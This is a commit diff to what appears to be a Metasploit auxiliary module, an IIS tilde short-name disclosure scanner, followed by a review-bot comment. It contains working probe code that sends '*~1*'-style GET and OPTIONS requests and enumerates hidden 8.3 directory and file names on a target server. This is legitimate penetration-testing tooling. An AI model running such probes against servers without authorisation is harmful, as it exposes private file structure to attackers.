GSoC/Meterpreter_Web_Console
root 2018-09-21 17:16:04 +00:00
parent 552ff027cd
commit 17c7d828c1
2 changed files with 38 additions and 43 deletions


@ -1,8 +1,7 @@
## Microsoft IIS shortname vulnerability scanner ## Microsoft IIS shortname vulnerability scanner
The vulnerability is caused by a tilde character "~" in a GET or OPTIONS request, which could allow remote attackers to diclose 8.3 filenames (short names). This is a new technique for an existing bug (CVE-2009-4444), which relied on the use of the ;(semicolon) character. Soroush Dalili discovered the original bug, while the new ~ technique was discovered by Soroush Dalili and Ali Abbasnejad. The vulnerability is caused by a tilde character "~" in a GET or OPTIONS request, which could allow remote attackers to diclose 8.3 filenames (short names). In 2010, Soroush Dalili and Ali Abbasnejad discovered the original bug (GET request) This was publicly disclosed in 2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.
## Vulnerable Application ## Vulnerable Application
@ -60,6 +59,5 @@ Create registry key NtfsDisable8dot3NameCreation at HKLM\SYSTEM\CurrentControlSe
## References ## References
CVE-2009-4444
https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability/ https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability/
https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability


@ -15,17 +15,17 @@ class MetasploitModule < Msf::Auxiliary
info, info,
'Name' => 'Microsoft IIS shortname vulnerability scanner', 'Name' => 'Microsoft IIS shortname vulnerability scanner',
'Description' => %q{ 'Description' => %q{
'The vulnerability is caused by a tilde character "~" in a GET or OPTIONS request, which The vulnerability is caused by a tilde character "~" in a GET or OPTIONS request, which
could allow remote attackers to diclose 8.3 filenames (short names). This is a new could allow remote attackers to diclose 8.3 filenames (short names). In 2010, Soroush Dalili
technique for an existing bug (CVE-2009-4444), which relied on the use of the ;(semicolon) and Ali Abbasnejad discovered the original bug (GET request). This was publicly disclosed in
character. Soroush Dalili discovered the original bug, while the new ~ technique was 2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.
discovered by Soroush Dalili and Ali Abbasnejad. Older IIS installations are vulnerable
with GET, newer installations with OPTIONS'
}, },
'Author' => 'Author' =>
[ [
'MinatoTW <shaks19jais[at]gmail.com>', 'Soroush Dalili', # Vulnerability discovery
'egre55 <ianaustin[at]protonmail.com>' 'Ali Abbasnejad', # Vulnerability discovery
'MinatoTW <shaks19jais[at]gmail.com>', # Metasploit module
'egre55 <ianaustin[at]protonmail.com>' # Metasploit module
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>
@ -84,31 +84,31 @@ class MetasploitModule < Msf::Auxiliary
end end
def is_vul def is_vul
for method in ['GET', 'OPTIONS'] for method in ['GET', 'OPTIONS']
res1 = send_request_cgi({ res1 = send_request_cgi({
'uri' => normalize_uri(datastore['PATH'], '*~1*'), 'uri' => normalize_uri(datastore['PATH'], '*~1*'),
'method' => method 'method' => method
}) })
res2 = send_request_cgi({ res2 = send_request_cgi({
'uri' => normalize_uri(datastore['PATH'],'QYKWO*~1*'), 'uri' => normalize_uri(datastore['PATH'],'QYKWO*~1*'),
'method' => method 'method' => method
}) })
if res1.code == 404 && res2.code != 404 if res1.code == 404 && res2.code != 404
vuln = 1 vuln = 1
@verb = method @verb = method
break break
end
end
if vuln == 1
return true
else
return false
end end
end
if vuln == 1
return true
else
return false
end
rescue Rex::ConnectionError rescue Rex::ConnectionError
print_bad("Failed to connect to target") print_bad("Failed to connect to target")
end end
def get_status(f , digit , match) def get_status(f , digit , match)
res2 = send_request_cgi({ res2 = send_request_cgi({
@ -155,7 +155,6 @@ class MetasploitModule < Msf::Auxiliary
for c in @found2 for c in @found2
@queue_ext << (f + c ) @queue_ext << (f + c )
end end
else
end end
end end
end end
@ -251,30 +250,28 @@ class MetasploitModule < Msf::Auxiliary
@threads << Thread.new { scan } @threads << Thread.new { scan }
} }
sleep(1) until @queue_ext.empty? Rex.sleep(1) until @queue_ext.empty?
@threads.each(&:join) @threads.each(&:join)
proto = datastore['SSL'] ? 'https' : 'http'
if @dirs.empty? if @dirs.empty?
print_status("No directories were found") print_status("No directories were found")
else else
print_good("Directories found") print_good("Found #{@dirs.size} directories")
@dirs.each do |x| @dirs.each do |x|
print_line("http://#{datastore['RHOST']}#{datastore['PATH']}#{x}") print_line("#{proto}://#{datastore['RHOST']}#{datastore['PATH']}#{x}")
end end
end end
if @files.empty? if @files.empty?
print_status("No files were found") print_status("No files were found")
else else
print_good("Files found") print_good("Found #{@files.size} files")
@files.each do |x| @files.each do |x|
print_line("http://#{datastore['RHOST']}#{datastore['PATH']}#{x}") print_line("#{proto}://#{datastore['RHOST']}#{datastore['PATH']}#{x}")
end end
end end
end end
end end
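Review bot: In is_vul the comparison `if res1.code == 404 && res2.code != 404` still dereferences both responses without a nil check, and send_request_cgi returns nil when the target does not answer within the timeout, so a slow or dropped response raises NoMethodError inside the loop instead of reaching the rescue clause; add `next unless res1 && res2` before the comparison. The `vuln` flag is never initialised, so the trailing `if vuln == 1 ... end` relies on nil being falsy; returning `true` directly from the loop body and `false` after it would remove the flag, and the `for method in ['GET', 'OPTIONS']` loop could become `%w[GET OPTIONS].each`. The `rescue Rex::ConnectionError` branch returns whatever print_bad returns rather than false, so a caller treating is_vul as a predicate gets nil on connection failure — add an explicit `false` after the print. In the run hunk the printed URL omits the port, so a target on a non-default RPORT produces a misleading link: `print_line("#{proto}://#{datastore['RHOST']}:#{datastore['RPORT']}#{datastore['PATH']}#{x}")` in both the directory and file loops.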